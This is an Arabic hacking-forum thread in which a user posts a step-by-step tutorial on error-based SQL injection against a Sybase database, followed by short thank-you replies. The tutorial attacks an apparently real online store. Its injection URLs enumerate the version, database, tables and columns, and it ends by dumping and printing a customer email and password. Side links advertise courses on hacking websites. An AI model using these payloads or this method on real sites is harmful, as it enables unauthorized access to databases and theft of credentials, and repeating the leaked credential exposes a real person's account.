1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ شرح ] Part II : حقن قواعد البيانات الــSQLI Sybase methods union || error+ Sybase+

الموضوع في '[ SQL-injection ]' بواسطة Hiker, بتاريخ ‏5 يوليو 2014.

كاتب الموضوع : Hiker المشاهدات : 632 الردود : 11 ‏5 يوليو 2014
حالة الموضوع:
مغلق
  1. غير متصل

    Hiker <span style="font-weight: bold; text-shadow: #BBBB
    rank
    V • I • P

    عضو منذ:
    ‏2 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:

    بسم الله الرحمن الرحيم
    السلام عليكم ورحمة الله وبركاتة
    الجزء الثاني من حقن قاعدة السايبيز
    بعد ما تم بعون الله شرح الجزء الأول
    http://www.iq-team.org/vb/t27267.html
    ان شاء الله سوف نتطرق الى الجزء الثاني من

    حقن قواعد Sybase

    عن طريق Error Based


    نستخدم هذا النوع من الحقن اذا كانت معطلة بعض الاستعلامات
    مثل السيرفرات اللينكس هناك بعض الدوال تعطل
    عندنا بالحقن ايضاَ استعلامات تعطل ومن ضمنها
    order by
    و
    union

    ملاحظة في مواقع بتمشي عليها النوعين من الحقن
    نشوف هالموقع
    كود PHP:
      http://store.organicgrown.com/index.php?action=product&id=226
      

    نقوم بوضع علامة سينكل كيويت '
    كما نلاحظ الخطأ الي في الصوره
    [​IMG]
    طيب
    نجرب امر or 1=1
    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=226%20or%201=1--

    اختفى الخطأ
    [​IMG]
    طيب نجرب امر استخراج اصدار القاعدة بالاستعلام التالي
    كود PHP:
      or 1=CONVERT(integer,@@version
      
    convert = امر تحويل من قيمة الى قيمة معينة
    integer = قيمة رقمية
    يعني كإنما نقول حولي امر الاستعلام حق اصدار القاعدة الى قيمة رقمية
    نشوف كيف
    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=226%20or%201=CONVERT%28integer,@@version%29--

    كما نلاحظ في الصورة اصدار القاعدة
    [​IMG]
    ملاحظة هنا تظهر المعلومات المطلوبة من خلال الخطأ الموجود في الصفحه
    طيب نكمل
    نستخرج اسم القاعدة من خلال الاستعلام الآتي
    كود PHP:
    or 1=CONVERT(integer,db_name())--
    لتصبح الحقنه
    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=226%20or%201=CONVERT%28integer,db_name%28%29%29--
      

    كما نلاحظ اسم القاعدة ogcstore
    كما موضحة في الصوره التي بالاسفل
    [​IMG]

    الان نستعلم اسماء الجداول من خلال الاستعلام الآتي

    كود PHP:
    or 1=CONVERT(integer,(select max(name || 0x3a || convert(char,id)) from db-name..sysobjects where type=0x55) )--


    مع تغيير ما يلزم

    الآن نأتي الى تفسير ما يجري في هذا الاستعلام
    يعني هنا كأني خاطبت القاعدة وقلت
    اختارلي من اقصى او اعلى مكان حسب الترتيب في القاعدة اسم الجدول من نواة قاعدة السايبيز اينما وجدت جدول المستخدم اي جدول اليوزر يعني الملخص امر لاستعلام جدول اليوزر واستخراجه من بين جميع جداول القاعدة ...

    اما بالنسبه لهذه

    استخدمة لكي اقوم بتحويل اسماء الجداول الى عدد ترقيمي الذي يكون ترتيبه بداخل القاعدة

    لاحظ الحقنة كيف راح اصير
    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=226%20or%201=CONVERT%28integer,%28select%20max%28name%20||%200x3a%20||%20convert%28char,id%29%29%20from%20ogcstore..sysobjects%20where%20type=0x55%29%20%29--

    لاحظ استخرجنا جدول اليوزر بسرعة
    وبجانبه رقم هذا ترتيب جدول اليوزر في القاعدة وكما موضح في الصورة
    ec_users:864003078
    [​IMG]

    طيب الآن نتوجة لإستخراج اسماء الاعمدة الموجودة بداخل جدول اليوزر
    هنا نستخدم امر لاسختراج اسماء الاعمدة نفس امر استعلام استخراج اسماء الجداول مع مرآعاة التغير اللازم لاحظ معي الاستعلام الخاص بإستخراج اسماء الأعمدة
    كود PHP:
    or 1=CONVERT(integer,(select max(name || 0x3a || convert(char,colid)) from db-name..syscolumns where id=table id) )--

    هنا الاستعلام بنفس تفسير الاستعلام السابق ولكن الاختلاف البسيط
    هو colid = ترتيب الأعمدة داخل الجدول الموجودة في القاعدة
    مع تغيير
    sysobjects
    الى
    syscolumns

    ونضع مكان table id
    ترتيب الرقمي لجدول اليوزر الي ضهر لنا بجانب جدول اليوزر الي هو 864003078
    لتصبح الحقنة بهذا الشكل
    كود PHP:
    or 1=CONVERT(integer,(select max(name || 0x3a || convert(char,colid)) from ogcstore..syscolumns where id=864003078) )--

    كما نلاحظ استخرجنا اسم العمود (zip:12)
    وبجانبه رقم ترتيب العمود في الجدول الي بداخل قاعدة السايبيز
    كما موضح بالصورة
    [​IMG]

    طيب نستخرج اسماء الاعمدة البقية

    بإضافة استعلام بسيط آخر الحقنة لاحظ الاستعلام
    كود PHP:
      and colid not in(column id) =   اضهرلي اسم العمود مع ترتيبة بداخل الجدول اي استخرجلي اي عمود غير الي بين القوسين
      
    فيصبح الاستعلام بشكل الآتي
    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=226%20or%201=CONVERT%28integer,%28select%20max%28name%20||%200x3a%20||%20convert%28char,colid%29%29%20from%20ogcstore..syscolumns%20where%20id=864003078%20and%20colid%20not%20in%2812%29%29%20%29--

    لاحظ عمود usertype
    الي ترتيبة داخل الجدول هو 2
    اي ثاني عمود داخل الجدول
    [​IMG]
    الان نكمل عالسريع في استخراج بقية الاعمدة
    لتصبح الحقنه بهذا الشكل لاحظ
    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=226%20or%201=CONVERT%28integer,%28select%20max%28name%20||%200x3a%20||%20convert%28char,colid%29%29%20from%20ogcstore..syscolumns%20where%20id=864003078%20and%20colid%20not%20in%2812,2,11,1,6,14,18,4,19,15,20,3,7,17,16,8,21,13,5,10%29%29%20%29--

    الآن تعرفنا على جميع اسماء الجداول
    وتعرفنا ايظاَ على عدد الأعمدة التي بداخل جدول اليوزر وهي 21 عمود
    كل الي يهمنه منه
    عمود email:8 و password:14

    الي يقع ترتيبهم بداخل جدول اليوزر في 8 و14

    طيب نكمل الحقنة لنستخرج بيانات الاعمدة
    نستخدم الحقنة النهائيه هذه
    كود PHP:
    or 1=CONVERT(integer,(select max (column name1 || 0x3a || column name2from table users)

    مع مرآعاة التغير اللازم
    وتصبح الحقنة بالشكل النهائي
    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=226%20or%201=CONVERT%28integer,%28select%20max%20%28email%20||%200x3a%20||%20password%29%20from%20ec_users%29%29--

    [​IMG]
    كما نلاحظ استخرجنا بيانات الاعمدة للاميل والباسورد
    xcortal@organicgrown.com:Sal3y57

    الى هنا تم بعونه تعالى واسف اذا طولت
    واي استفسار انا حاضر او اي شئ غامض
    الى هنا نستودعكم الله

     


    جاري تحميل الصفحة...
  2. غير متصل

    Resident Evil
    rank
    Developer

    عضو منذ:
    ‏27 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: Part II : حقن قواعد البيانات الــSQLI Sybase methods union || error+ Sybase+

    *

    الـسلام عليكم ,,

    جميل يعطيك العافيه

    رمـضان كـريم :{y.}
     


  3. غير متصل

    zezo the king
    rank
    Developer

    عضو منذ:
    ‏23 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: Part II : حقن قواعد البيانات الــSQLI Sybase methods union || error+ Sybase+

    يعطيك العآفية , حبيبي مبدع
    بكل معنى الكلمة
     


  4. غير متصل

    X - DeSiGN
    rank
    Developer

    عضو منذ:
    ‏30 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: Part II : حقن قواعد البيانات الــSQLI Sybase methods union || error+ Sybase+

    مشآء الله يسلمو يا مبدع ! !:"
     


  5. غير متصل

    йỘ-įṖ
    Active DeveloPer

    عضو منذ:
    ‏24 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:

    رد: Part II : حقن قواعد البيانات الــSQLI Sybase methods union || error+ Sybase+

    تِسلَمْ آيدَكْ عَ هذآ آلطَرحْ آلمُمَيزْ ~ ،

    وآصِلْ يَ بَطلْ ~
    .
     


  6. غير متصل

    М.ñàƒƒà3
    rankrank
    Active DeveloPer

    عضو منذ:
    ‏30 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    الإقامة:

    رد: Part II : حقن قواعد البيانات الــSQLI Sybase methods union || error+ Sybase+

    تسلم أيدك يابطل ً#ٌ5oًًًُ.
     


  7. غير متصل

    sTRANGE WORLd
    Developer

    عضو منذ:
    ‏28 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    الوظيفة:
    قهر الحمايات
    الإقامة:

    رد: Part II : حقن قواعد البيانات الــSQLI Sybase methods union || error+ Sybase+

    بارك الله فيك
    مشكور على الطرح و المجهود
    تقبل تحياتي ً#ٌ5oًًًُ.​
     


  8. غير متصل

    A.R.K.A.N
    DeveloPer Plus

    عضو منذ:
    ‏8 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    15
    نقاط الجائزة:
    الإقامة:

    رد: Part II : حقن قواعد البيانات الــSQLI Sybase methods union || error+ Sybase+

    احسنت على هذا الطرح اتمنى لك التوفيق
     


  9. غير متصل

    Abo MalaK
    rank
    Developer

    عضو منذ:
    ‏15 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: Part II : حقن قواعد البيانات الــSQLI Sybase methods union || error+ Sybase+

    يعطيك العافية يا مبدع
     


  10. غير متصل

    Ahmed Egy
    rank
    Developer

    عضو منذ:
    ‏11 ديسمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    الإقامة:

    رد: Part II : حقن قواعد البيانات الــSQLI Sybase methods union || error+ Sybase+

    تسلم اخى الكريم على الشرح ~
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...